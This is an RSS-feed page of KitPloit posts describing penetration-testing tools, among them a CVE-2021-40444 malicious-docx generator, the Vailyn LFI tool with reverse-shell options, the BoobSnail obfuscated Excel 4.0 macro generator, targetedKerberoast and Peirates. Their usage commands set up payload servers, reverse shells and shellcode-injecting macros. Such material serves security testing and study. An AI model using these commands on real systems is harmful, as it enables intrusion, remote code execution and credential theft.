RSS Security

πŸ”’
❌ About FreshRSS
There are new articles available, click to refresh the page.
Yesterday β€” 16 September 2021KitPloit - PenTest & Hacking Tools

DNSTake - A Fast Tool To Check Missing Hosted DNS Zones That Can Lead To Subdomain Takeover

16 September 2021 at 20:30
By: Zion3R


A fast tool to check missing hosted DNS zones that can lead to subdomain takeover.


What is a DNS takeover?

DNS takeover vulnerabilities occur when a subdomain (subdomain.example.com) or domain has its authoritative nameserver set to a provider (e.g. AWS Route 53, Akamai, Microsoft Azure, etc.) but the hosted zone has been removed or deleted. Consequently, when making a request for DNS records the server responds with a SERVFAIL error. This allo ws an attacker to create the missing hosted zone on the service that was being used and thus control all DNS records for that (sub)domain.ΒΉ


Installation

from Binary

The ez way! You can download a pre-built binary from releases page, just unpack and run!


from Source
NOTE: Go 1.16+ compiler should be installed & configured!

Very quick & clean!

β–Ά go install github.com/pwnesia/dnstake/cmd/[email protected]

β€” or

Manual building executable from source code:

β–Ά git clone https://github.com/pwnesia/dnstake
β–Ά cd dnstake/cmd/dnstake
β–Ά go build .
β–Ά (sudo) mv dnstake /usr/local/bin

Usage
$ dnstake -h

Β·β–„β–„β–„β–„ ▐ β–„ .β–„β–„ Β·β–„β–„β–„β–„β–„ β–„β–„β–„Β· β–„ β€’β–„ β–„β–„β–„ .
β–ˆβ–ˆβ–ͺ β–ˆβ–ˆ β€’β–ˆβ–Œβ–β–ˆβ–β–ˆ β–€.β€’β–ˆβ–ˆ β–β–ˆ β–€β–ˆ β–ˆβ–Œβ–„β–Œβ–ͺβ–€β–„.β–€Β·
β–β–ˆΒ· β–β–ˆβ–Œβ–β–ˆβ–β–β–Œβ–„β–€β–€β–€β–ˆβ–„β–β–ˆ.β–ͺβ–„β–ˆβ–€β–€β–ˆ ▐▀▀▄·▐▀▀β–ͺβ–„
β–ˆβ–ˆ. β–ˆβ–ˆ β–ˆβ–ˆβ–β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–ŒΒ·β–β–ˆ β–ͺβ–β–Œβ–β–ˆ.β–ˆβ–Œβ–β–ˆβ–„β–„β–Œ
β–€β–€β–€β–€β–€β€’ β–€&#9600 ; β–ˆβ–ͺ β–€β–€β–€β–€ β–€β–€β–€ β–€ β–€ Β·β–€ β–€ β–€β–€β–€

(c) pwnesia.org β€” v0.0.1

Usage:
[stdin] | dnstake [options]
dnstake -t HOSTNAME [options]

Options:
-t, --target <HOST/FILE> Define single target host/list to check
-c, --concurrent <i> Set the concurrency level (default: 25)
-s, --silent Suppress errors and/or clean output
-h, --help Display its help

Examples:
dnstake -t (sub.)domain.tld
dnstake -t hosts.txt
cat hosts.txt | dnstake
subfinder -silent -d domain.tld | dnstake

Workflow

DNSTake use RetryableDNS client library to send DNS queries. Initial engagement using Google & Cloudflare DNS as the resolver, then check & fingerprinting the nameservers of target host β€” if there is one, it will resolving the target host again with its nameserver IPs as resolver, if it gets weird DNS status response (other than NOERROR/NXDOMAIN), then it's vulnerable to be taken over. More or less like this in form of a diagram.

Currently supported DNS providers, see here.


References

License

DNSTake is distributed under MIT. See LICENSE.



CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)

16 September 2021 at 13:13
By: Zion3R


Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)


Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file)

You need to install lcab first (sudo apt-get install lcab)

Check REPRODUCE.md for manual reproduce steps

If your generated cab is not working, try pointing out exploit.html URL to calc.cab


Using

First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system()

python3 exploit.py generate test/calc.dll http://<SRV IP>



Once you generate the malicious docx (will be at out/) you can setup the server:

sudo python3 exploit.py host 80



Finally try the docx in a Windows Virtual Machine:

Β 


Plution - Prototype Pollution Scanner Using Headless Chrome

16 September 2021 at 11:30
By: Zion3R


Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: https://github.com/BlackFan/client-side-prototype-pollution/tree/master/pp


What this is not

This is not a one stop shop. Prototype pollution is a complicated beast. This tool does nothing you couldn't do manually. This is not a polished bug-free super tool. It is functional but poorly coded and to be considered alpha at best.


How it works

Plution appends a payload to supplied URLs, naviguates to each URL with headless chrome and runs javascript on the page to verify if a prototype was successfully polluted.


how it is used
  • Basic scan, output only to screen:
    cat URLs.txt | plution

  • Scan with a supplied payload rather than hardcoded one:
    cat URLs.txt|plution -p '__proto__.zzzc=example'
    Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.

  • Output:
    Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.

  • Concurrency:

  • Pass the '-c' option to specify how many concurrent jobs are run (default is 5)


questions and answers
  • How do I install it?
    go get -u github.com/raverrr/plution

  • why specifically limit it to checking if window.zzzc is defined?
    zzzc is a short pattern that is unlikely to already be in a prototype. If you want more freedom in regards to the javascript use https://github.com/detectify/page-fetch instead

  • Got a more specific question?
    Ask me on twitter @divadbate.



Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution

16 September 2021 at 03:00
By: Zion3R


Time for another Kali Linux release! – Kali Linux 2021.1. This release has various impressive updates.

A summary of the changes since the 2021.2 release from June are:

  • OpenSSL - Wide compatibility by default - Keep reading for what that means
  • New Kali-Tools site - Following the footsteps of Kali-Docs, Kali-Tools has had a complete refresh
  • Better VM support in the Live image session - Copy & paste and drag & drop from your machine into a Kali VM by default
  • New tools - From adversary emulation, to subdomain takeover to Wi-Fi attacks
  • Kali NetHunter smartwatch - first of its kind, for TicHunter Pro
  • KDE 5.21 - Plasma desktop received a version bump
Before yesterdayKitPloit - PenTest & Hacking Tools

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

15 September 2021 at 20:30
By: Zion3R


Vailyn


Phased Path Traversal & LFI Attacks

Vailyn 3.0

Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use --lfi to include them in the scan.


About

Vailyn is a multi-phased vulnerability analysis and exploitation tool for path traversal and file inclusion vulnerabilities. It is built to make it as performant as possible, and to offer a wide arsenal of filter evasion techniques.


How does it work?

Vailyn operates in 2 phases. First, it checks if the vulnerability is present. It does so by trying to access /etc/passwd (or a user-specified file), with all of its evasive payloads. Analysing the response, payloads that worked are separated from the others.

Now, the user can choose freely which payloads to use. Only these payloads will be used in the second phase.

The second phase is the exploitation phase. Now, it tries to leak all possible files from the server using a file and a directory dictionary. The search depth and the directory permutation level can be adapted via arguments. Optionally, it can download found files, and save them in its loot folder. Alternatively, it will try to obtain a reverse shell on the system, letting the attacker gain full control over the server.

Right now, it supports multiple attack vectors: injection via query, path, cookie and POST data.


Why the phase separation?

The separation in several phases is done to hugely improve the performance of the tool. In previous versions, every file-directory combination was checked with every payload. This resulted in a huge overhead due to payloads being always used again, despite not working for the current page.


Installation

Recommended & tested Python versions are 3.7+, but it should work fine with Python 3.5 & Python 3.6, too. To install Vailyn, download the archive from the release tab, or perform

$ git clone https://github.com/VainlyStrain/Vailyn

Once on your system, you'll need to install the Python dependencies.


Unix Systems

On Unix systems, it is sufficient to run

$ pip install -r requirements.txt   # --user

Windows

Some libraries Vailyn uses do not work well with Windows, or will fail to install.

If you use Windows, use pip to install the requirements listed in Vailyn\Β·β€Ί\requirements-windows.txt.

If twisted fails to install, there is an unofficial version available here, which should build under Windows. Just bear in mind that this is a 3rd party download, and the integrity isn't necessarily guaranteed. After this installed successfully, running pip again on requirements-windows.txt should work.


Final Steps

If you want to fully use the reverse shell module, you'll need to have sshpass, ncat and konsole installed. Package names vary by Linux distribution. On Windows, you'll need to start the listener manually beforehand. If you don't like konsole, you can specify a different terminal emulator in core/config.py.

That's it! Fire Vailyn up by moving to its installation directory and performing

$ python Vailyn -h

Usage

Vailyn has 3 mandatory arguments: -v VIC, -a INT and -p2 TP P1 P2. However, depending on -a, more arguments may be required.

   ,                \                  /               , 
':. \. /\. ./ .:'
':;. :\ .,:/ ''. /; ..::'
',':.,.__.'' ' ' `:.__:''.:'
';.. ,;' *
* '., .:'
`v;. ;v' o
. ' '.. :.' ' .
' ':;, ' '
o ' . :
*
| Vailyn |
[ VainlyStrain ]

Vsynta Vailyn -v VIC -a INT -p2 TP P1 P2
[-p PAM] [-i F] [-Pi VIC2]
[-c C] [-n] [-d I J K]
[-s T] [-t] [-L]
[-l] [-P] [-A]

mandatory:
-v VIC, --victim VIC Target to attack, part 1 [pre-payload]
-a INT, --attack INT Attack type (int, 1-5, or A)< br/>
A| Spider (all) 2| Path 5| POST Data, json
P| Spider (partial) 3| Cookie
1| Query Parameter 4| POST Data, plain

-p2 TP P1 P2, --phase2 TP P1 P2
Attack in Phase 2, and needed parameters

β”Œ[ Values ]─────────────┬────────────────────┐
β”‚ TP β”‚ P1 β”‚ P2 β”‚
β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€
β”‚ leak β”‚ File Dict β”‚ Directory Dict β”‚
β”‚ inject β”‚ IP Addr β”‚ Listening Port β”‚
β”‚ implant β”‚ Source File β”‚ Server Destination β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”΄β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

additional:
-p PAM, --param PAM query parameter or POST data for --attack 1, 4, 5
-i F, --check F File to check for in Phase 1 (df: etc/passwd)
-Pi VIC2, --vic2 VIC2 Attack Target, part 2 [post-payload]
-c C, --cookie C Cookie to append (in header format)
-l, --loot Download found files into the loot folder
-d I J K, --depths I J K
depths (I: phase 1, J: phase 2, K: permutation level )
-h, --help show this help menu and exit
-s T, --timeout T Request Timeout; stable switch for Arjun
-t, --tor Pipe attacks through the Tor anonymity network
-L, --lfi Additionally use PHP wrappers to leak files
-n, --nosploit skip Phase 2 (does not need -p2 TP P1 P2)
-P, --precise Use exact depth in Phase 1 (not a range)
-A, --app Start Vailyn's Qt5 interface

develop:
--debug Display every path tried, even 404s.
--version Print program version and exit.
--notmain Avoid notify2 crash in subprocess call.

Info:
to leak files using absolute paths: -d 0 0 0
to get a shell using absolute paths: -d 0 X 0

Vailyn currently supports 5 attack vectors, and provides a crawler to automate all of them. The attack performed is identified by the -a INT argument.

INT        attack
---- -------
1 query-based attack (https://site.com?file=../../../)
2 path-based attack (https://site.com/../../../)
3 cookie-based attack (will grab the cookies for you)
4 plain post data (ELEM1=VAL1&ELEM2=../../../)
5 json post data ({"file": "../../../"})
A spider fetch + analyze all URLs from site using all vectors
P partial spider fetch + analyze all URLs from site using only selected vectors

You also must specify a target to attack. This is done via -v VIC and -Pi VIC2, where -v is the part before the injection point, and -Pi the rest.

Example: if the final URL should look like: https://site.com/download.php?file=<ATTACK>&param2=necessaryvalue, you can specify -v https://site.com/download.php and -Pi &param2=necessaryvalue (and -p file, since this is a query attack).

If you want to include PHP wrappers in the scan (like php://filter), use the --lfi argument. At the end of Phase 1, you'll be presented with an additional selection menu containing the wrappers that worked. (if any)

If the attacked site is behind a login page, you can supply an authentication cookie via -c COOKIE. If you want to attack over Tor, use --tor.


Phase 1

This is the analysis phase, where working payloads are separated from the others.

By default, /etc/passwd is looked up. If the server is not running Linux, you can specify a custom file by -i FILENAME. Note that you must include subdirectories in FILENAME. You can modify the lookup depth with the first value of -d (default=8). If you want to use absolute paths, set the first depth to 0.


Phase 2

This is the exploitation phase, where Vailyn will try to leak as much files as possible, or gain a reverse shell using various techniques.

The depth of lookup in phase 2 (the maximal number of layers traversed back) is specified by the second value of the -d argument. The level of subdirectory permutation is set by the third value of -d.

If you attack with absolute paths and perform the leak attack, set all depths to 0. If you want to gain a reverse shell, make sure that the second depth is greater than 0.

By specifying -l, Vailyn will not only display files on the terminal, but also download and save the files into the loot folder.

If you want a verbose output (display every output, not only found files), you can use --debug. Note that output gets really messy, this is basically just a debug help.

To perform the bruteforce attack, you need to specify -p2 leak FIL PATH, where

  • FIL is a dictionary file containing filenames only (e.g. index.php)
  • PATH, is a dictionary file containing directory names only. Vailyn will handle directory permutation for you, so you'll need only one directory per line.

To gain a reverse shell by code injection, you can use -p2 inject IP PORT, where

  • IP is your listening IP
  • PORT is the port you want to listen on.

WARNING

Vailyn employs Log Poisoning techniques. Therefore, YOUR SPECIFIED IP WILL BE VISIBLE IN THE SERVER LOGS.

The techniques (only work for LFI inclusions):

  • /proc/self/environ inclusion only works on outdated servers
  • Apache + Nginx Log Poisoning & inclusion
  • SSH Log Poisoning
  • poisoned mail inclusion
  • wrappers
    • expect://
    • data:// (plain & b64)
    • php://input

False Positive prevention

To distinguish real results from false positives, Vailyn does the following checks:

  • check the status code of the response
  • check if the response is identical to one taken before attack start: this is useful e.g, when the server returns 200, but ignores the payload input or returns a default page if the file is not found.
  • similar to #2, perform an additional check for query GET parameter handling (useful when server returns error that a needed parameter is missing)
  • check for empty responses
  • check if common error signatures are in the response content
  • check if the payload is contained in the response: this is an additional check for the case the server responds 200 for non-existing files, and reflects the payload in a message (like ../../secret not found)
  • check if the entire response is contained in the init check response: useful when the server has a default include which disappears in case of 404
  • for -a 2, perform an additional check if the response content matches the content from the server root URL
  • REGEX check for /etc/passwd if using that as lookup file

Examples
  • Simple Query attack, leaking files in Phase 2: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file --> http://site.com/download.php?file=../INJECT

  • Query attack, but I know a file file.php exists on exactly 2 levels above the inclusion point: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 leak dicts/files dicts/dirs -p file -i file.php -d 2 X X -P This will shorten the duration of Phase 1 very much, since its a targeted attack.

  • Simple Path attack: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs --> http://site.com/../INJECT

  • Path attack, but I need query parameters and tag: $ Vailyn -v "http://site.com/" -a 2 -p2 leak dicts/files dicts/dirs -Pi "?token=X#title" --> http://site.com/../INJECT?token=X#title

  • Simple Cookie attack: $ Vailyn -v "http://site.com/cookiemonster.php" -a 3 -p2 leak dicts/files dicts/dirs Will fetch cookies and you can select cookie you want to poison

  • POST Plain Attack: $ Vailyn -v "http://site.com/download.php" -a 4 -p2 leak dicts/files dicts/dirs -p "DATA1=xx&DATA2=INJECT" will infect DATA2 with the payload

  • POST JSON Attack: $ Vailyn -v "http://site.com/download.php" -a 5 -p2 leak dicts/files dicts/dirs -p '{"file": "INJECT"}'

  • Attack, but target is behind login screen: $ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"

  • Attack, but I want a reverse shell on port 1337: $ Vailyn -v "http://site.com/download.php" -a 1 -p2 inject MY.IP.IS.XX 1337 # a high Phase 2 Depth is needed for log injection (will start a ncat listener for you if on Unix)

  • Full automation in crawler mode: $ Vailyn -v "http://root-url.site" -a A you can also specify other args, like cookie, depths, lfi & lookup file here

  • Full automation, but Arjun needs --stable: $ Vailyn -v "http://root-url.site" -a A -s ANY


Demo

A phased, evasive Path Traversal + LFI scanning &amp; exploitation tool in Python (4) Vailyn's Crawler analyzing a damn vulnerable web application. LFI Wrappers are not enabled.

GUI Demonstration (v2.2.1-5)


Possible Issues

Found some false positives/negatives (or want to point out other bugs/improvements): please leave an issue!


Code of Conduct

Vailyn is provided as an offensive web application audit tool. It has built-in functionalities which can reveal potential vulnerabilities in web applications, which could be exploited maliciously.

THEREFORE, NEITHER THE AUTHOR NOR THE CONTRIBUTORS ARE RESPONSIBLE FOR ANY MISUSE OR DAMAGE DUE TO THIS TOOLKIT.

By using this software, the user obliges to follow their local laws, to not attack someone else's system without explicit permission from the owner, or with malicious intent.

In case of an infringement, only the end user who committed it is accountable for their actions.


Credits & Copyright

Vailyn: Copyright Β© VainlyStrain

Arjun: Copyright Β© s0md3v

Arjun is no longer distributed with Vailyn. Install its latest version via pip.



Rootend - A *Nix Enumerator And Auto Privilege Escalation Tool

15 September 2021 at 11:30
By: Zion3R


rootend is a python *nix Enumerator & Auto Privilege Escalation tool.

For a full list of our tools, please visit our website https://www.twelvesec.com/

Written by:


Usage
Enumeration & Automation Privilege Escalation tool. rootend is an open source tool licensed under GPLv3. Affected systems: *nix. Written by: @nickvourd of @twelvesec. Special thanks to @maldevel & servo. https://www.twelvesec.com/ Please visit https://github.com/twelvesec/rootend for more.. optional arguments: -h, --help show this help message and exit -v, --version show version and exit -a, --auto automated privilege escalation process -m, --manual system enumeration -n, --nocolor disable color -b, --banner show banner and exit -s, --suid suid binary enumeration -w, --weak weak permissions of files enumeration -p, --php PHP configuration files enumeration -c, --capabilities capabilities enumeration -f, --full-writables world writable files enumeration usage examples: ./rootend.py -a ./rootend.py -m ./rootend.py -v ./rootend.py -b Specific categories usage examples: ./rootend.py -a -s ./rootend.py -m -w ./rootend.py -a -s -p ./rootend.py -m -w -c -p ./rootend.py -a -s -c -p -f *Use the above arguments with -n to disable color. ">
___________              .__                _________              
\__ ___/_ _ __ ____ | |___ __ ____ / _____/ ____ ____
| | \ \/ \/ // __ \| |\ \/ // __ \ \_____ \_/ __ \_/ ___\
| | \ /\ ___/| |_\ /\ ___/ / \ ___/\ \___
|____| \/\_/ \___ >____/\_/ \___ >_______ /\___ >\___ >
\/ \/ \/ \/ \/
rootend v.2.0.2 - Enumeration & Automation Privilege Escalation tool.
rootend is an open source tool licensed under GPLv3.
Affected systems: *nix.
Written by: @nickvourd of @twelvesec.
Special thanks to @maldevel & servo.
https://www.twelvesec.com/
Please visit https://github.com/twelvesec/rootend for more..

optional arguments:
-h, --help show this help message and exit
-v, --version show version and exit
-a, --auto automated privilege escalatio n process
-m, --manual system enumeration
-n, --nocolor disable color
-b, --banner show banner and exit
-s, --suid suid binary enumeration
-w, --weak weak permissions of files enumeration
-p, --php PHP configuration files enumeration
-c, --capabilities capabilities enumeration
-f, --full-writables world writable files enumeration

usage examples:
./rootend.py -a
./rootend.py -m
./rootend.py -v
./rootend.py -b

Specific categories usage examples:
./rootend.py -a -s
./rootend.py -m -w
./rootend.py -a -s -p
./rootend.py -m -w -c -p
./rootend.py -a -s -c -p -f

*Use the above arguments with -n to disable color.


Version

2.0.2

Supports
  • Python 2.x
  • Python 3.x

Tested on
  • Python 2.7.18rc1
  • Python 3.8.2

Modes
  • Manual
  • Auto

Exploitation Categories

Suid Binaries:
  • General Suids
  • Suids for reading files
  • Suids for creating file as root
  • Limited Suids
  • Custom Suids

Weak Permissions:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Weak Ownership:
  • /etc/passwd
  • /etc/shadow
  • apache2.conf
  • httpd.conf
  • redis.conf
  • /root

Capabilities:
  • General Capabilities
  • Custom Capabilities
  • With CAP_SETUID

Interesting Files:
  • PHP Configuration Files
  • World Writable Files


BoobSnail - Allows Generating Excel 4.0 XLM Macro

14 September 2021 at 20:30
By: Zion3R


BoobSnail allows generating XLM (Excel 4.0) macro. Its purpose is to support the RedTeam and BlueTeam in XLM macro generation. Features:

  • various infection techniques;
  • various obfuscation techniques;
  • translation of formulas into languages other than English;
  • can be used as a library - you can easily write your own generator.

Building and Running

Tested on: Python 3.8.7rc1

pip install -r requirements.txt
python boobsnail.py
___. ___. _________ .__.__
\_ |__ ____ ____\_ |__ / _____/ ____ _____ |__| |
| __ \ / _ \ / _ \| __ \ \_____ \ / \__ \ | | |
| \_\ ( <_> | <_> ) \_\ \/ \ | \/ __ \| | |__
|___ /\____/ \____/|___ /_______ /___| (____ /__|____/
\/ \/ \/ \/ \/
Author: @_mzer0 @stm_cyber
(...)

Generators usage
python boobsnail.py <generator> -h

To display available generators type:

python boobsnail.py

Examples

Generate obfuscated macro that injects x64 or x86 shellcode:

python boobsnail.py Excel4NtDonutGenerator --inputx86 <PATH_TO_SHELLCODE> --inputx64 <PATH_TO_SHELLCODE> --out boobsnail.csv

Generate obfuscated macro that runs calc.exe:

python boobsnail.py Excel4ExecGenerator --cmd "powershell.exe -c calc.exe" --out boobsnail.csv

Saving output in Excel
  1. Dump output to CSV file.
  2. Copy content of CSV file.
  3. Run Excel and create a new worksheet.
  4. Add new Excel 4.0 Macro (right-click on Sheet1 -> Insert -> MS Excel 4.0 Macro).
  5. Paste the content in cell A1 or R1C1.
  6. Click Data -> Text to Columns.
  7. Click Next -> Set Semicolon as separator and click Finish.

Library usage

BoobSnail shares the excel4lib library that allows creating your own Excel4 macro generator. excel4lib contains few classes that could be used during writing generator:

  • excel4lib.macro.Excel4Macro - allows to defining Excel4 formulas, values variables;
  • excel4lib.macro.obfuscator.Excel4Obfuscator - allows to obfuscate created instructions in Excel4Macro;
  • excel4lib.lang.Excel4Translator - allows translating formulas to another language.

The main idea of this library is to represent Excel4 formulas, variables, formulas arguments, and values as python objects. Thanks to that you are able to change instructions attributes such as formulas or variables names, values, addresses, etc. in an easy way. For example, let's create a simple macro that runs calc.exe

from excel4lib.macro import *
# Create macro object
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=EXEC(cmd);

Now let's say that you want to obfuscate your macro. To do this you just need to import obfuscator and pass it to the Excel4Macro object:

from excel4lib.macro import *
from excel4lib.macro.obfuscator import *
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

For now excel4lib shares two obfuscation classes:

  • excel4lib.macro.obfuscator.Excel4Obfuscator uses Excel 4.0 functions such as BITXOR, SUM, etc to obfuscate your macro;
  • excel4lib.macro.obfuscator.Excel4Rc4Obfuscator uses RC4 encryption to obfusacte formulas.

As you can see you can write your own obfuscator class and use it in Excel4Macro.

Sometimes you will need to translate your macro to another language for example your native language, in my case it's Polish. With excel4lib it's pretty easy. You just need to import Excel4Translator class and call set_language

from excel4lib.macro import *
from excel4lib.lang.excel4_translator import *
# Change language
Excel4Translator.set_language("pl_PL")
# Create macro object
macro = Excel4Macro("test.csv", obfuscator=Excel4Obfuscator())
# Add variable called cmd with value "calc.exe" to the worksheet
cmd = macro.variable("cmd", "calc.exe")
# Add EXEC formula with argument cmd
macro.formula("EXEC", cmd)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc.exe";
=URUCHOM.PROGRAM(cmd);

For now, only the English and Polish language is supported. If you want to use another language you need to add translations in the excel4lib/lang/langs directory.

For sure, you will need to create a formula that takes another formula as an argument. You can do this by using Excel4Macro.argument function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Create CONCATENATE formula that CONCATENATEs cmd_1 and cmd_2
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
macro.formula("EXEC", exec_arg)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";
.exe;
=EXEC(CONCATENATE(cmd,R2C1));

As you can see ".exe" string was passed to CONCATENATE formula as R2C1. R2C1 is address of ".exe" value (ROW number 2 and COLUMN number 1). excel4lib returns references to formulas, values as addresses. References to variables are returned as their names. You probably noted that Excel4Macro class adds formulas, variables, values to the worksheet automaticly in order in which these objects are created and that the start address is R1C1. What if you want to place formulas in another column or row? You can do this by calling Excel4Macro.set_cords function.

from excel4lib.macro import *
macro = Excel4Macro("test.csv")
# Column 1
# Add variable called cmd with value "calc" to the worksheet
cmd_1 = macro.variable("cmd", "calc")
# Add cell containing .exe as value
cmd_2 = macro.value(".exe")
# Column 2
# Change cords to columns 2
macro.set_cords(2,1)
exec_arg = macro.argument("CONCATENATE", cmd_1, cmd_2)
# Pass CONCATENATE call as argument to EXEC formula
exec_call = macro.formula("EXEC", exec_arg)
# Column 1
# Back to column 1. Change cords to column 1 and row 3
macro.set_cords(1,3)
# GOTO EXEC call
macro.goto(exec_call)
# Dump to CSV
print(macro.to_csv())

Result:

cmd="calc";=EXEC(CONCATENATE(cmd,R2C1));
.exe;;
=GOTO(R1C2);;

Author

mzer0 from stm_cyber team!


Articles

The first step in Excel 4.0 for Red Team

BoobSnail - Excel 4.0 macro generator



targetedKerberoast - Kerberoast With ACL Abuse Capabilities

14 September 2021 at 11:30
By: Zion3R


targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abuse of a write permission on the servicePrincipalName attribute), print the "kerberoast" hash, and delete the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, or supplied in a list, or one user supplied in the CLI.

More information about this attack


Usage

This tool supports the following authentications

Among other things, targetedKerberoast supports multi-level verbosity, just append -v, -vv, ... to the command :)

Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line --no-pass don't ask for password (useful for -k) -p PASSWORD, --password PASSWORD password to authenticate with -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH NT/LM hashes, format is LMhash:NThash --aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits) ">
usage: targetedKerberoast.py [-h] [-v] [-q] [-D TARGET_DOMAIN] [-U USERS_FILE] [--request-user username] [-o OUTPUT_FILE] [--use-ldaps] [--only-abuse] [--no-abuse] [--dc-ip ip address] [-d DOMAIN] [-u USER]
[-k] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key]

Queries target domain for SPNs that are running under a user account and operate targeted Kerberoasting

optional arguments:
-h, --help show this help message and exit
-v, --verbose verbosity level (-v for verbose, -vv for debug)
-q, --quiet show no information at all
-D TARGET_DOMAIN, --target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-U USERS_FILE, --users-file USERS_FILE
File with user per line to test
--request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-o OUTPUT_FILE, --output-file OUTPUT_FILE
Output filename to write ciphers in JtR/hashcat format
--use-ldaps Use LDAPS instead of LDAP
--only-abuse Ignore accounts that already have an SPN and focus on targeted Kerberoasting
--no-abuse Don't attempt targeted Kerberoasting

authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with

secrets:
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameter s. If valid credentials cannot be found, it will use the ones specified in the
command line
--no-pass don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)

Below is an example what the tool can do.


Credits and references

Credits to the whole team behind Impacket and its contributors.



Peirates - Kubernetes Penetration Testing Tool

13 September 2021 at 20:30
By: Zion3R


What is Peirates?

Peirates, a Kubernetes penetration tool, enables an attacker to escalate privilege and pivot through a Kubernetes cluster. It automates known techniques to steal and collect service accounts, obtain further code execution, and gain control of the cluster.


Where do I run Peirates?

You run Peirates from a container running on Kubernetes.


Does Peirates attack a Kubernetes cluster?

Yes, it absolutely does. Talk to your lawyer and the cluster owners before using this tool in a Kubernetes cluster.


Who creates Peirates?

InGuardians' CTO Jay Beale first conceived of Peirates and put together a group of InGuardians developers to create it with him, including Faith Alderson, Adam Crompton and Dave Mayer. Faith convinced us to all learn Golang, so she could implement the tool's use of the kubectl library from the Kubernetes project. Adam persuaded the group to use a highly-interactive user interface. Dave brought contagious enthusiasm. Together, these four developers implemented attacks and began releasing this tool that we use on our penetration tests.


Do you welcome contributions?

Yes, we absolutely do. Submit a pull request and/or reach out to [email protected].


What license is this released under?

Peirates is released under the GPLv2 license.


Modules

Building and Running

If you just want the peirates binary to start attacking things, grab the latest release from the releases page.

However, if you want to build from source, read on!

Get peirates

go get -v "github.com/inguardians/peirates"

Get libary sources if you haven't already (Warning: this will take almost a gig of space because it needs the whole kubernetes repository)

go get -v "k8s.io/kubectl/pkg/cmd" "github.com/aws/aws-sdk-go"

Build the executable

cd $GOPATH/github.com/inguardians/peirates
./build.sh

This will generate an executable file named peirates in the same directory.



Gokart - A Static Analysis Tool For Securing Go Code

13 September 2021 at 11:30
By: Zion3R


GoKart is a static analysis tool for Go that finds vulnerabilities using the SSA (single static assignment) form of Go source code. It is capable of tracing the source of variables and function arguments to determine whether input sources are safe, which reduces the number of false positives compared to other Go security scanners. For instance, a SQL query that is concatenated with a variable might traditionally be flagged as SQL injection; however, GoKart can figure out if the variable is actually a constant or constant equivalent, in which case there is no vulnerability.


Why We Built GoKart

Static analysis is a powerful technique for finding vulnerabilities in source code. However, the approach has suffered from being noisy - that is, many static analysis tools find quite a few "vulnerabilities" that are not actually real. This has led to developer friction as users get tired of the tools "crying wolf" one time too many.

